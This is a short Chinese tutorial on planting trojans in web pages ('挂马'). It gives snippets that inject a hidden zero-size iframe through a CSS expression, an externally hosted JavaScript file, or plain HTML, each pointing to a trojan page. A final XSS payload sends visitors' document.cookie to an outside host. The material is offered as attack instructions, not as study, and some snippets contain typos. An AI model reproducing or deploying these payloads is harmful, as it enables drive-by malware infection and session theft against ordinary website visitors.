1.我们只要在CSS文件中包含以下代码即可。
Body{
Hytop: expression(op.document.body.innerHTML = top.document.body.innerHTML +’\r\n<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>’;);
}
然后在我们要挂马的页面引用这个CSS文件就可以了,引用代码如下。
<link href=”css.css” rel=”stylesheet” type=”text/css”>
2.
Top.document.body.innerHTML = top.document.body.innerHTML +’\r\n<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>’;
然后依次选择“文件”>“另存为(A)…”保存为.js文件,如图10。将其上传到你所能控制的服务器中。
现 在我们只要在那个网页中插入< script src=http://你的JS文件保存地址></script>,以后只要有人浏览这个页面就会偷偷的转向我们JS文件里的 http://www.***.com/muma.htm,从而达到挂马的目的。
3.<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
4.var img = document.createElement(‘img’); img.src='<a href=’http://www.xss.com?cookie=’+document.cookie’>http://www.xss.com?cookie=’+document.cookie; img.style.display=’none'; document.getElementsByTagName(‘body’)[0].appendChild(img);